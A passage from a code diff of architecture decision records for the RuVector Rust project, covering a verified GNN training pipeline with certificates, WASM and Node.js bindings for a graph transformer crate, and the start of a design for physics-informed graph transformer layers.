pub struct RobustnessCertificate {
/// Certified perturbation radius.
pub certified_radius: f64,
/// Fraction of nodes certified robust.
pub certified_fraction: f64,
/// Method used.
pub method: CertificationMethod,
/// Attestation.
pub attestation: ProofAttestation,
}
```
### Training Certificate
At the end of a training run, a `TrainingCertificate` is produced by composing all step attestations:
```rust
pub struct TrainingCertificate {
/// Total training steps completed.
pub total_steps: u64,
/// Total invariant violations (zero if fully verified).
pub violations: u64,
/// Number of steps that proceeded via OverrideProof (degraded mode).
pub overridden_steps: u64,
/// Composed attestation over all steps via compose_chain.
pub attestation: ProofAttestation,
/// Final loss value.
pub final_loss: f64,
/// Final coherence score (if CoherenceBound invariant was active).
pub final_coherence: Option<f64>,
/// Robustness certificate (if adversarial certification was run).
pub robustness: Option<RobustnessCertificate>,
/// Epoch at which the certificate was sealed.
pub epoch: u64,
/// Per-invariant statistics.
pub invariant_stats: Vec<InvariantStats>,
// --- Artifact binding (hardening move #7) ---
/// BLAKE3 hash of the final model weights. Binds certificate to
/// the exact model artifact. Cannot be separated.
pub weights_hash: [u8; 32],
/// BLAKE3 hash of the VerifiedTrainerConfig (serialized).
pub config_hash: [u8; 32],
/// BLAKE3 hash of the dataset manifest (or RVF manifest root).
/// None if no dataset manifest was provided.
pub dataset_manifest_hash: Option<[u8; 32]>,
/// BLAKE3 hash of the code (build hash / git commit).
/// None if not provided.
pub code_build_hash: Option<[u8; 32]>,
}
pub struct InvariantStats {
/// Invariant name.
pub name: String,
/// Whether this invariant is formally proven or a statistical estimate.
pub proof_class: ProofClass,
/// Number of times checked.
pub checks: u64,
/// Number of times satisfied.
pub satisfied: u64,
/// Number of times overridden (degraded mode).
pub overridden: u64,
/// Average verification latency.
pub avg_latency_ns: u64,
/// Proof tier distribution: [reflex_count, standard_count, deep_count].
pub tier_distribution: [u64; 3],
}
pub enum ProofClass {
/// Formally proven: exact computation within the proof system.
Formal,
/// Statistical estimate with bound scope. Certificate records
/// the estimation parameters (rng_seed, iterations, tolerance).
Statistical {
rng_seed: Option<u64>,
iterations: usize,
tolerance: f64,
},
}
impl VerifiedTrainer {
/// Seal the training run and produce a certificate.
///
/// 1. Compacts the mutation ledger (proof-gated: compaction itself
/// produces a composed attestation + witness that the compacted
/// chain corresponds exactly to the original sequence).
/// 2. Computes BLAKE3 hashes of weights, config, and optional manifests.
/// 3. Composes all attestations into the final certificate.
///
/// The sealed certificate is a product artifact: verifiable by
/// third parties without trusting training logs.
pub fn seal(self, weights: &Weights) -> TrainingCertificate;
}
```
### Performance Budget
The target is proof overhead < 5% of training step time. For a typical GNN training step of ~10 ms (on CPU):
- `LossMonotonicity` (Reflex): < 10 ns = 0.0001%
- `WeightNormBound` (Standard): < 1 us = 0.01%
- `LipschitzBound` (Standard): < 10 us = 0.1%
- `CoherenceBound` (Standard): < 5 us = 0.05%
- `PermutationEquivariance` (Deep, sampled): < 100 us = 1%
- Attestation composition: < 1 us = 0.01%
- **Total**: < 120 us = 1.2% (well within 5% budget)
For GPU-accelerated training (step time ~1 ms), `PermutationEquivariance` with many samples may exceed 5%. Mitigation: reduce sample count or check equivariance every N steps (configurable via `check_interval` in `VerifiedTrainerConfig`).
### Integration with EWC and Replay Buffer
The `VerifiedTrainer` composes with `ruvector-gnn`'s continual learning primitives:
```rust
pub struct VerifiedTrainerConfig {
/// Optimizer type (from ruvector-gnn).
pub optimizer: OptimizerType,
/// EWC lambda (0.0 = disabled). Uses ruvector_gnn::ElasticWeightConsolidation.
pub ewc_lambda: f64,
/// Replay buffer size (0 = disabled). Uses ruvector_gnn::ReplayBuffer.
pub replay_buffer_size: usize,
/// Scheduler type (from ruvector-gnn).
pub scheduler: SchedulerType,
/// Invariants to verify per step.
pub invariants: Vec<TrainingInvariant>,
/// Check interval for expensive invariants (e.g., equivariance).
/// Cheap invariants (Reflex tier) run every step.
pub expensive_check_interval: usize,
/// Warmup steps during which invariant violations are logged but
/// do not trigger rollback. After warmup, fail-closed applies.
pub warmup_steps: usize,
/// Robustness certification config (None = disabled).
pub robustness: Option<RobustnessCertifier>,
/// Energy gate config (None = disabled).
/// If enabled, energy is evaluated before every gradient application.
pub energy_gate: Option<EnergyGateConfig>,
/// Default rollback strategy for invariant failures.
pub rollback_strategy: RollbackStrategy,
/// Allow degraded mode: if true, failed invariant checks produce
/// an OverrideProof and increment a visible violation counter
/// instead of stopping the step. Default: false (fail-closed).
pub allow_override: bool,
/// Optional dataset manifest hash for binding to the certificate.
pub dataset_manifest_hash: Option<[u8; 32]>,
/// Optional code build hash for binding to the certificate.
pub code_build_hash: Option<[u8; 32]>,
}
```
When EWC is enabled, the `WeightNormBound` invariant is automatically adjusted to account for the EWC penalty term. When the replay buffer is active, replayed samples also go through invariant verification.
## Consequences
### Positive
- Every training run produces a `TrainingCertificate` bound to the exact model weights via BLAKE3 hash — portable, verifiable by third parties without trusting logs
- Per-step invariant proofs catch regressions immediately — loss spikes, norm explosions, equivariance breaks become training-stopping events, not evaluation surprises
- Clear distinction between formally proven invariants and statistical estimates — the certificate is defensible because it states exactly what was proven and what was estimated
- EnergyGate integration makes training behave like inference gating — consistent proof-gated mutation across the full lifecycle
- Delta-apply rollback strategy avoids doubling peak memory while preserving proof-gated semantics
- Fail-closed by default with explicit OverrideProof for degraded mode — violations are visible, not silent
### Negative
- `PermutationEquivariance` is a statistical test, not a formal proof — the certificate is honest about this, but it means equivariance is not guaranteed, only tested with bound scope
- `LipschitzBound` via power iteration is an estimate — the certificate attests the estimate was within bounds, not the true Lipschitz constant
- The `TrainingCertificate` is only as strong as the invariants specified — missing invariants are not caught
- Robustness certification (IBP/DeepPoly) produces loose bounds for deep models; the certified radius may be conservative
- Over-conservative invariants can stop learning — mitigated by check intervals, warmup periods, and adaptive thresholds (which are themselves bounded)
### Risks
- **Proof cache hit rate drops**: High learning rate causes diverse weight states, Standard/Deep proofs dominate and exceed 5% budget. Mitigated by caching invariant structure (not values) — proof terms depend on structure, values are parameters. Monitor `ProofStats::cache_hit_rate` and alert below 80%
- **GPU steps dominated by Deep checks**: Schedule deep checks asynchronously with two-phase commit: provisional update, finalize after deep check, revert if failed. Mitigation preserves proof-gated semantics without blocking the training loop
- **EWC Fisher information**: O(n_params^2) in naive case. The existing diagonal approximation may miss cross-parameter interactions. Mitigated by periodic full Fisher computation (every K epochs) as a Deep-tier invariant
- **Attestation chain growth**: 82 bytes per step * 100,000 steps = 8 MB. Mitigated by `MutationLedger::compact` — compaction is itself proof-gated: it produces a composed attestation plus a witness that the compacted chain corresponds exactly to the original sequence under the current epoch algebra
- **Certificate separation**: Without artifact binding, the certificate can be detached from the model. Mitigated by BLAKE3 hashes of weights, config, dataset manifest, and code build hash in the certificate
### Acceptance Test
Train 200 steps with invariants enabled, then intentionally inject one bad gradient update that would push a layer norm above `max_norm`. The system must:
1. Reject the step (fail-closed)
2. Emit a refusal attestation to the ledger
3. Leave weights unchanged (delta-apply was not committed)
4. The sealed `TrainingCertificate` must show exactly one violation with the correct step index and invariant name
5. The `weights_hash` in the certificate must match the actual final weights
## Implementation
1. Define `TrainingInvariant` enum and `VerifiedTrainerConfig` in `crates/ruvector-graph-transformer/src/verified_training/invariants.rs`
2. Implement `VerifiedTrainer` wrapping `ruvector_gnn::training::Optimizer` in `crates/ruvector-graph-transformer/src/verified_training/pipeline.rs`
3. Implement invariant-to-ProofKind mapping for tier routing
4. Implement `RobustnessCertifier` with IBP and DeepPoly in `crates/ruvector-graph-transformer/src/verified_training/mod.rs`
5. Implement `TrainingCertificate` and `seal()` method
6. Add benchmarks: verified training step overhead on a 3-layer GNN (128-dim, 10K nodes)
7. Integration test: train a small GNN for 100 steps with all invariants, verify certificate
## References
- ADR-045: Lean-Agentic Integration (`ProofEnvironment`, `FastTermArena`)
- ADR-046: Graph Transformer Unified Architecture (module structure)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, `MutationLedger`, `compose_chain`)
- `crates/ruvector-gnn/src/training.rs`: `Optimizer`, `OptimizerType`, `TrainConfig`, `sgd_step`
- `crates/ruvector-gnn/src/ewc.rs`: `ElasticWeightConsolidation`
- `crates/ruvector-gnn/src/scheduler.rs`: `LearningRateScheduler`, `SchedulerType`
- `crates/ruvector-gnn/src/replay.rs`: `ReplayBuffer`, `ReplayEntry`
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`, `verify_tiered`
- `crates/ruvector-verified/src/proof_store.rs`: `ProofAttestation`, `create_attestation`
- `crates/ruvector-verified/src/fast_arena.rs`: `FastTermArena`
- `crates/ruvector-coherence/src/spectral.rs`: `SpectralCoherenceScore`, `SpectralTracker`
- `crates/ruvector-mincut-gated-transformer/src/energy_gate.rs`: `EnergyGate`
- Gowal et al., "Scalable Verified Training" (ICML 2019) -- IBP training
- Singh et al., "Abstract Interpretation with DeepPoly" (POPL 2019)

View File

@@ -0,0 +1,489 @@
# ADR-050: Graph Transformer WASM and Node.js Bindings
## Status
Accepted
## Date
2026-02-25
## Context
RuVector's existing crates ship WASM and Node.js bindings following a consistent pattern: a `-wasm` crate using `wasm-bindgen` and a `-node` crate using `napi-rs`. Examples include `ruvector-gnn-wasm` / `ruvector-gnn-node`, `ruvector-graph-wasm` / `ruvector-graph-node`, `ruvector-verified-wasm`, and `ruvector-mincut-wasm` / `ruvector-mincut-node`.
The new `ruvector-graph-transformer` crate (ADR-046) needs equivalent bindings so that TypeScript/JavaScript applications can use proof-gated graph transformers in the browser (WASM) and on the server (Node.js via NAPI-RS). The challenge is deciding which subset of the Rust API to expose, managing the WASM binary size (target < 300 KB), and ensuring feature parity where feasible.
### Existing Binding Patterns
From `crates/ruvector-gnn-wasm/Cargo.toml`:
- `crate-type = ["cdylib", "rlib"]`
- Dependencies: `ruvector-gnn` with `default-features = false, features = ["wasm"]`
- Uses `serde-wasm-bindgen = "0.6"` for struct serialization
- Release profile: `opt-level = "z"`, `lto = true`, `codegen-units = 1`, `panic = "abort"`
From `crates/ruvector-gnn-node/Cargo.toml`:
- `crate-type = ["cdylib"]`
- Dependencies: `napi = { workspace = true }`, `napi-derive = { workspace = true }`
- Build dependency: `napi-build = "2"`
- Release profile: `lto = true`, `strip = true`
From `crates/ruvector-verified-wasm/Cargo.toml`:
- Dependencies: `ruvector-verified` with `features = ["ultra"]`
- Uses `wasm-bindgen`, `serde-wasm-bindgen`, `js-sys`, `web-sys`
- Release profile: `opt-level = "s"`, `lto = true`
## Decision
We will create two binding crates following the established workspace patterns:
- `crates/ruvector-graph-transformer-wasm/` -- WASM bindings via `wasm-bindgen`
- `crates/ruvector-graph-transformer-node/` -- Node.js bindings via `napi-rs` (v2.16)
### API Surface: What to Expose
Not all Rust functionality translates efficiently to WASM/JS. The binding surface is scoped to three tiers:
**Tier 1 -- Core (both WASM and Node.js)**:
| API | Rust Source | Binding |
|-----|------------|---------|
| `GraphTransformer::new(config)` | `lib.rs` | Constructor, takes JSON config |
| `GraphTransformer::forward(batch)` | `lib.rs` | Returns `ProofGatedOutput` as JSON |
| `GraphTransformer::mutate(op)` | `lib.rs` | Returns mutation result + attestation |
| `ProofGate::unlock()` | `proof_gated/gate.rs` | Unlocks and returns inner value |
| `ProofGate::is_satisfied()` | `proof_gated/gate.rs` | Boolean check |
| `proof_chain()` | `proof_gated/mod.rs` | Returns attestation array as `Uint8Array[]` |
| `coherence()` | via `ruvector-coherence` | Returns coherence snapshot as JSON |
**Tier 2 -- Attention (both WASM and Node.js)**:
| API | Rust Source | Binding |
|-----|------------|---------|
| `PprSampledAttention::new()` | `sublinear_attention/ppr.rs` | Constructor |
| `LshSpectralAttention::new()` | `sublinear_attention/lsh.rs` | Constructor |
| `certify_complexity()` | `sublinear_attention/mod.rs` | Returns complexity bound as JSON |
| `SpectralSparsifier::sparsify()` | `sublinear_attention/spectral_sparsify.rs` | Returns sparsified edge list |
**Tier 3 -- Training (Node.js only, not WASM)**:
| API | Rust Source | Binding |
|-----|------------|---------|
| `VerifiedTrainer::new(config)` | `verified_training/pipeline.rs` | Constructor |
| `VerifiedTrainer::step()` | `verified_training/pipeline.rs` | Single training step |
| `VerifiedTrainer::seal()` | `verified_training/pipeline.rs` | Returns `TrainingCertificate` as JSON |
| `RobustnessCertifier::certify()` | `verified_training/mod.rs` | Returns certificate as JSON |
Training is excluded from WASM because:
1. Training requires `rayon` for parallelism (not available in WASM)
2. `ElasticWeightConsolidation` uses `ndarray` with BLAS, which adds ~500 KB to WASM size
3. Training workloads are server-side; inference is the browser use case
### WASM Crate Structure
```
crates/ruvector-graph-transformer-wasm/
Cargo.toml
src/
lib.rs # wasm_bindgen entry points
types.rs # TS-friendly wrapper types (JsValue serialization)
proof_gate.rs # ProofGate WASM bindings
attention.rs # Sublinear attention WASM bindings
error.rs # Error conversion to JsValue
tests/
web.rs # wasm-bindgen-test integration tests
package.json # npm package metadata
tsconfig.json # TypeScript configuration for generated types
```
```toml
# Cargo.toml
[package]
name = "ruvector-graph-transformer-wasm"
version = "2.0.4"
edition = "2021"
rust-version = "1.77"
license = "MIT"
description = "WASM bindings for ruvector-graph-transformer: proof-gated graph transformers in the browser"
[lib]
crate-type = ["cdylib", "rlib"]
[dependencies]
ruvector-graph-transformer = { version = "2.0.4", path = "../ruvector-graph-transformer",
default-features = false,
features = ["proof-gated", "sublinear-attention"] }
wasm-bindgen = { workspace = true }
serde-wasm-bindgen = "0.6"
serde = { workspace = true, features = ["derive"] }
serde_json = { workspace = true }
js-sys = { workspace = true }
web-sys = { workspace = true, features = ["console"] }
getrandom = { workspace = true, features = ["wasm_js"] }
[dev-dependencies]
wasm-bindgen-test = "0.3"
[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
[profile.release.package."*"]
opt-level = "z"
```
### WASM Binding Implementation
```rust
// src/lib.rs
use wasm_bindgen::prelude::*;
use ruvector_graph_transformer::{GraphTransformer, GraphTransformerConfig};
#[wasm_bindgen]
pub struct WasmGraphTransformer {
inner: GraphTransformer,
}
#[wasm_bindgen]
impl WasmGraphTransformer {
/// Create a new graph transformer from JSON config.
#[wasm_bindgen(constructor)]
pub fn new(config_json: &str) -> Result<WasmGraphTransformer, JsValue> {
let config: GraphTransformerConfig = serde_json::from_str(config_json)
.map_err(|e| JsValue::from_str(&e.to_string()))?;
let inner = GraphTransformer::new(config, DefaultPropertyGraph::new())
.map_err(|e| JsValue::from_str(&e.to_string()))?;
Ok(Self { inner })
}
/// Run forward pass. Input and output are JSON-serialized.
pub fn forward(&mut self, batch_json: &str) -> Result<JsValue, JsValue> {
// Deserialize, run forward, serialize result
// ...
}
/// Get the proof attestation chain as an array of Uint8Arrays.
pub fn proof_chain(&self) -> Result<JsValue, JsValue> {
let chain = self.inner.proof_chain();
let array = js_sys::Array::new();
for att in chain {
let bytes = att.to_bytes();
let uint8 = js_sys::Uint8Array::from(&bytes[..]);
array.push(&uint8);
}
Ok(array.into())
}
/// Get coherence snapshot as JSON.
pub fn coherence(&self) -> Result<String, JsValue> {
let snapshot = self.inner.coherence();
serde_json::to_string(&snapshot)
.map_err(|e| JsValue::from_str(&e.to_string()))
}
}
```
### Node.js Crate Structure
```
crates/ruvector-graph-transformer-node/
Cargo.toml
src/
lib.rs # napi-rs entry points
types.rs # NAPI-RS type wrappers
proof_gate.rs # ProofGate Node bindings
attention.rs # Sublinear attention Node bindings
training.rs # VerifiedTrainer Node bindings (Tier 3)
build.rs # napi-build
index.d.ts # TypeScript type declarations
package.json # npm package metadata
__test__/
index.spec.mjs # Node.js integration tests
```
```toml
# Cargo.toml
[package]
name = "ruvector-graph-transformer-node"
version = "2.0.4"
edition = "2021"
rust-version = "1.77"
license = "MIT"
description = "Node.js bindings for ruvector-graph-transformer via NAPI-RS"
[lib]
crate-type = ["cdylib"]
[dependencies]
ruvector-graph-transformer = { version = "2.0.4", path = "../ruvector-graph-transformer",
features = ["full"] }
napi = { workspace = true }
napi-derive = { workspace = true }
serde_json = { workspace = true }
[build-dependencies]
napi-build = "2"
[profile.release]
lto = true
strip = true
```
### Node.js Binding Implementation (Training Example)
```rust
// src/training.rs
use napi::bindgen_prelude::*;
use napi_derive::napi;
use ruvector_graph_transformer::verified_training::{
VerifiedTrainer, VerifiedTrainerConfig, TrainingCertificate,
};
#[napi(object)]
pub struct JsTrainingCertificate {
pub total_steps: u32,
pub violations: u32,
pub final_loss: f64,
pub final_coherence: Option<f64>,
pub attestation_hex: String,
}
#[napi]
pub struct NodeVerifiedTrainer {
inner: VerifiedTrainer,
}
#[napi]
impl NodeVerifiedTrainer {
#[napi(constructor)]
pub fn new(config_json: String) -> Result<Self> {
let config: VerifiedTrainerConfig = serde_json::from_str(&config_json)
.map_err(|e| Error::from_reason(e.to_string()))?;
let inner = VerifiedTrainer::new(config)
.map_err(|e| Error::from_reason(e.to_string()))?;
Ok(Self { inner })
}
#[napi]
pub fn step(&mut self, loss: f64, gradients_json: String) -> Result<String> {
// Deserialize gradients, run step, serialize attestation
// ...
}
#[napi]
pub fn seal(&mut self) -> Result<JsTrainingCertificate> {
// Seal training run and return certificate
// ...
}
}
```
### WASM Size Budget
Target: < 300 KB for the release `.wasm` binary (gzipped).
Size breakdown estimate:
| Component | Estimated Size |
|-----------|---------------|
| `ruvector-verified` (proof gates, arena, attestations) | ~40 KB |
| `ruvector-solver` (forward-push, random-walk, neumann) | ~60 KB |
| `ruvector-attention` (core attention only, no training) | ~80 KB |
| `ruvector-coherence` (metrics, no spectral) | ~15 KB |
| `wasm-bindgen` glue | ~20 KB |
| Serde JSON | ~50 KB |
| **Total (estimated)** | ~265 KB |
Size is controlled by:
1. `opt-level = "z"` (optimize for size)
2. `lto = true` (dead code elimination across crates)
3. `panic = "abort"` (no unwinding machinery)
4. `default-features = false` on `ruvector-graph-transformer` (only `proof-gated` and `sublinear-attention`)
5. Excluding training and the `spectral` feature from `ruvector-coherence`
If the target is exceeded, further reductions:
- Replace `serde_json` with `miniserde` (-30 KB)
- Strip `tracing` instrumentation via feature flag (-10 KB)
- Use `wasm-opt -Oz` post-processing (-10-20%)
### TypeScript Types
Both packages ship TypeScript type declarations. The WASM package generates types via `wasm-bindgen`'s `--typescript` flag. The Node.js package uses `napi-rs`'s automatic `.d.ts` generation from `#[napi]` attributes.
Key TypeScript interfaces:
```typescript
// Generated by wasm-bindgen / napi-rs
export interface GraphTransformerConfig {
proofGated: boolean;
attentionMechanism: 'ppr' | 'lsh' | 'spectral-sparsify';
pprAlpha?: number;
pprTopK?: number;
lshTables?: number;
lshBits?: number;
spectralEpsilon?: number;
}
export interface ProofGatedOutput<T> {
value: T;
satisfied: boolean;
attestationHex: string;
}
export interface ComplexityBound {
opsUpperBound: number;
memoryUpperBound: number;
complexityClass: string;
}
export interface TrainingCertificate {
totalSteps: number;
violations: number;
finalLoss: number;
finalCoherence: number | null;
attestationHex: string;
invariantStats: InvariantStats[];
}
```
### Feature Parity Matrix
| Feature | Rust | WASM | Node.js |
|---------|------|------|---------|
| ProofGate<T> | Yes | Yes | Yes |
| Three-tier routing | Yes | Yes | Yes |
| Attestation chain | Yes | Yes | Yes |
| PPR-sampled attention | Yes | Yes | Yes |
| LSH spectral attention | Yes | Yes | Yes |
| Spectral sparsification | Yes | Yes | Yes |
| Hierarchical coarsening | Yes | No (1) | Yes |
| Memory-mapped processing | Yes | No (2) | Yes |
| VerifiedTrainer | Yes | No (3) | Yes |
| Robustness certification | Yes | No (3) | Yes |
| EWC continual learning | Yes | No (3) | Yes |
| Coherence (spectral) | Yes | No (4) | Yes |
| Coherence (basic) | Yes | Yes | Yes |
Notes:
1. Hierarchical coarsening uses `rayon` parallelism, unavailable in WASM
2. `mmap` is not available in WASM environments
3. Training is server-side only (see rationale above)
4. Spectral coherence uses `ndarray` with heavy numerics; excluded for size
### Build Pipeline
**WASM**:
```bash
cd crates/ruvector-graph-transformer-wasm
wasm-pack build --target web --release --out-dir ../../pkg/graph-transformer-wasm
# Verify size
ls -la ../../pkg/graph-transformer-wasm/*.wasm
```
**Node.js**:
```bash
cd crates/ruvector-graph-transformer-node
# NAPI-RS build for current platform
npx napi build --release --platform
# Cross-compile for CI (linux-x64-gnu, darwin-arm64, win32-x64-msvc)
npx napi build --release --target x86_64-unknown-linux-gnu
npx napi build --release --target aarch64-apple-darwin
npx napi build --release --target x86_64-pc-windows-msvc
```
### Testing Strategy
**WASM** (`wasm-bindgen-test`):
```rust
#[cfg(test)]
mod tests {
use wasm_bindgen_test::*;
wasm_bindgen_test_configure!(run_in_browser);
#[wasm_bindgen_test]
fn test_graph_transformer_roundtrip() {
let config = r#"{"proofGated": true, "attentionMechanism": "ppr"}"#;
let gt = WasmGraphTransformer::new(config).unwrap();
assert!(gt.coherence().is_ok());
}
#[wasm_bindgen_test]
fn test_proof_chain_returns_uint8arrays() {
// Verify attestation chain serialization
}
}
```
**Node.js** (via `jest` or `vitest`):
```javascript
import { GraphTransformer, VerifiedTrainer } from '@ruvector/graph-transformer-node';
test('forward pass returns proof-gated output', () => {
const gt = new GraphTransformer('{"proofGated": true, "attentionMechanism": "ppr"}');
const result = gt.forward(batchJson);
expect(result.satisfied).toBe(true);
expect(result.attestationHex).toHaveLength(164); // 82 bytes = 164 hex chars
});
test('verified training produces certificate', () => {
const trainer = new VerifiedTrainer(configJson);
for (let i = 0; i < 10; i++) {
trainer.step(loss, gradientsJson);
}
const cert = trainer.seal();
expect(cert.totalSteps).toBe(10);
expect(cert.violations).toBe(0);
});
```
### npm Package Names
- WASM: `@ruvector/graph-transformer-wasm`
- Node.js: `@ruvector/graph-transformer-node`
Both published under the `ruvnet` npm account (already authenticated per `CLAUDE.md`).
## Consequences
### Positive
- TypeScript/JavaScript developers get proof-gated graph transformers with zero Rust toolchain requirement
- WASM < 300 KB enables browser-side inference with proof verification
- Node.js bindings get full feature parity including verified training
- Consistent binding patterns with existing `-wasm` and `-node` crates reduce maintenance burden
- TypeScript types provide compile-time safety for JS consumers
### Negative
- WASM lacks training, hierarchical coarsening, and spectral coherence -- feature gap may confuse users
- Two binding crates double the CI build matrix
- NAPI-RS cross-compilation requires platform-specific CI runners (or cross-rs)
- Serialization overhead (JSON for config, `Uint8Array` for attestations) adds latency compared to native Rust
### Risks
- WASM size may exceed 300 KB if `ruvector-solver` brings in unexpected transitive dependencies. Mitigated by `default-features = false` and `wasm-pack --release` size verification in CI
- NAPI-RS version 2.16 may introduce breaking changes in minor releases. Mitigated by pinning to workspace version
- Browser `WebAssembly.Memory` limits (4 GB on 64-bit, 2 GB on 32-bit) may be hit for large graphs. Mitigated by streaming processing and the `certify_complexity` API that rejects oversized graphs before execution
## Implementation
1. Create `crates/ruvector-graph-transformer-wasm/` following the structure above
2. Create `crates/ruvector-graph-transformer-node/` following the structure above
3. Add both to `[workspace.members]` in root `Cargo.toml`
4. Implement Tier 1 (core) bindings first, test with `wasm-bindgen-test` and Node.js
5. Implement Tier 2 (attention) bindings
6. Implement Tier 3 (training) in Node.js only
7. CI: add `wasm-pack build` and `napi build` to GitHub Actions workflow
8. Publish to npm: `@ruvector/graph-transformer-wasm` and `@ruvector/graph-transformer-node`
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, feature flags)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, `ProofAttestation` serialization)
- ADR-048: Sublinear Graph Attention (attention API surface)
- ADR-049: Verified Training Pipeline (`VerifiedTrainer`, `TrainingCertificate`)
- `crates/ruvector-gnn-wasm/Cargo.toml`: WASM binding pattern (opt-level "z", panic "abort")
- `crates/ruvector-gnn-node/Cargo.toml`: NAPI-RS binding pattern (napi-build, cdylib)
- `crates/ruvector-verified-wasm/Cargo.toml`: Verified WASM binding pattern (serde-wasm-bindgen)
- `crates/ruvector-graph-wasm/Cargo.toml`: Graph WASM binding pattern
- Workspace `Cargo.toml`: `wasm-bindgen = "0.2"`, `napi = { version = "2.16" }`, `napi-derive = "2.16"`

View File

@@ -0,0 +1,258 @@
# ADR-051: Physics-Informed Graph Transformer Layers
## Status
Accepted
## Date
2026-02-25
## Context
Many real-world graphs -- molecular dynamics simulations, particle physics detectors, protein interaction networks, climate meshes -- obey physical conservation laws, symmetries, and variational principles. Standard graph transformers learn representations from data alone, ignoring these inductive biases. This wastes training data (100x more samples required to implicitly learn energy conservation) and produces physically inconsistent predictions that diverge after a few integration steps.
RuVector already provides the building blocks for physics-informed graph transformers across several crates:
- `ruvector-mincut-gated-transformer/src/energy_gate.rs`: `EnergyGate`, `EnergyGateConfig` for energy-based gating decisions
- `ruvector-attention/src/sheaf/restriction.rs`: `RestrictionMap` for parallel transport (gauge connections on graph fiber bundles)
- `ruvector-attention/src/sheaf/attention.rs`: `SheafAttention`, `SheafAttentionConfig` for sheaf cohomology attention
- `ruvector-attention/src/transport/sliced_wasserstein.rs`: `SlicedWassersteinAttention` for optimal transport on graphs
- `ruvector-attention/src/pde_attention/diffusion.rs`: `DiffusionAttention` for heat/diffusion equation on graphs
- `ruvector-attention/src/pde_attention/laplacian.rs`: graph Laplacian operators for PDE discretization
- `ruvector-attention/src/curvature/fused_attention.rs`: `MixedCurvatureFusedAttention` for Ricci flow
- `ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`, `verify_tiered` for proof-gated verification
However, there is no unified module that composes these into physics-informed graph transformer layers with formally verified conservation laws. The research document `docs/research/gnn-v2/22-physics-informed-graph-transformers.md` outlines the theoretical framework but defines no implementation path through the existing crates.
## Decision
We will implement a `physics` module in `ruvector-graph-transformer` behind the `physics` feature flag. The module provides three layer types -- `HamiltonianGraphNet`, `LagrangianAttention`, and `GaugeEquivariantMP` -- each integrated with the proof-gated mutation protocol (ADR-047) to certify conservation laws per forward step.
### HamiltonianGraphNet
Symplectic leapfrog integration that PROVES energy is conserved, not just checks post-hoc:
```rust
/// Hamiltonian graph network with symplectic integration.
///
/// Each forward step produces a ProofGate<HamiltonianOutput> whose
/// proof requirement is energy conservation within tolerance.
pub struct HamiltonianGraphNet {
/// Learned kinetic energy: T(p) via MLP.
kinetic_net: MLP,
/// Learned potential energy: V(q) + sum_{(i,j)} U(q_i, q_j).
potential_net: GraphAttentionPotential,
/// Integration timestep (fixed or learned).
dt: f32,
/// Leapfrog steps per layer.
num_steps: usize,
/// Energy tolerance for proof gate (relative |dE/E|).
energy_tolerance: f64,
/// Bridges to ruvector-mincut-gated-transformer::energy_gate.
energy_gate: EnergyGateConfig,
}
impl HamiltonianGraphNet {
/// Symplectic forward pass with energy conservation proof.
///
/// Executes Stormer-Verlet leapfrog integration on the graph.
/// After integration, computes |H_final - H_initial| / |H_initial|
/// and routes through ProofTier::Reflex (< 10 ns) since this is
/// a scalar comparison. If drift exceeds tolerance, escalates to
/// ProofTier::Standard for diagnosis.
pub fn forward(
&self,
positions: &mut [f32], // [n x d] node positions (q)
momenta: &mut [f32], // [n x d] node momenta (p)
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<HamiltonianOutput>>;
/// Compute Hamiltonian H(q, p) = T(p) + V(q) + sum U(q_i, q_j).
pub fn hamiltonian(
&self,
positions: &[f32],
momenta: &[f32],
graph: &impl GraphRepr,
) -> f32;
}
```
The proof requirement for each step is:
```rust
ProofRequirement::InvariantPreserved {
invariant_id: ENERGY_CONSERVATION_INVARIANT,
}
```
This maps to `ProofKind::DimensionEquality` (scalar comparison of energy values) and routes to `ProofTier::Reflex` in steady state, keeping overhead below 10 ns per step.
### GaugeEquivariantMP
Uses sheaf restriction maps as gauge connections:
```rust
/// Gauge-equivariant message passing using sheaf attention.
///
/// Restriction maps from ruvector-attention::sheaf serve as connection
/// forms (parallel transport operators) on the graph fiber bundle.
/// Attention weights are invariant under gauge transformations g_i at
/// each node because keys are parallel-transported to the query frame
/// before the dot product: alpha_{ij} = softmax(q_i^T A_{ij} k_j).
pub struct GaugeEquivariantMP {
/// Sheaf attention (restriction maps = gauge connections).
sheaf_attention: SheafAttention,
/// Gauge group dimension.
gauge_dim: usize,
/// Yang-Mills regularization strength.
ym_lambda: f32,
/// Proof requirement: gauge invariance check.
gauge_proof: ProofRequirement,
}
impl GaugeEquivariantMP {
/// Gauge-invariant attention forward pass.
///
/// Parallel-transports keys via RestrictionMap before dot product.
/// Computes Yang-Mills action as regularization loss.
pub fn forward(
&self,
queries: &[f32],
keys: &[f32],
values: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<AttentionOutput>>;
/// Yang-Mills action: S_YM = sum_{plaquettes} ||F_{ijk}||^2.
/// Measures curvature (field strength) of the gauge connection.
pub fn yang_mills_action(&self, graph: &impl GraphRepr) -> f32;
}
```
### LagrangianAttention
Action-minimizing message passing via optimal transport:
```rust
/// Lagrangian attention using action-weighted optimal transport.
///
/// The attention weight between nodes i and j is proportional to
/// exp(-beta * W_2(mu_i, mu_j)), where W_2 is Wasserstein-2 distance.
/// This is the information-geometric dual of kinetic energy in
/// Wasserstein space: L = (1/2) ||d mu/dt||^2_{W_2}.
///
/// Delegates to ruvector-attention::transport::SlicedWassersteinAttention
/// for the transport computation and wraps in proof gate for
/// action bound verification.
pub struct LagrangianAttention {
/// Sliced Wasserstein transport from ruvector-attention.
transport: SlicedWassersteinAttention,
/// Inverse temperature for action weighting.
beta: f32,
/// Variational integrator timestep.
dt: f32,
/// Action bound proof requirement.
action_proof: ProofRequirement,
}
impl LagrangianAttention {
/// Variational forward pass.
///
/// Computes discrete Euler-Lagrange equations on the graph.
/// Action bound is verified via ProofTier::Standard (bounded
/// fuel for action functional evaluation).
pub fn forward(
&self,
q_prev: &[f32],
q_curr: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<LagrangianOutput>>;
}
```
### PDE Attention Integration
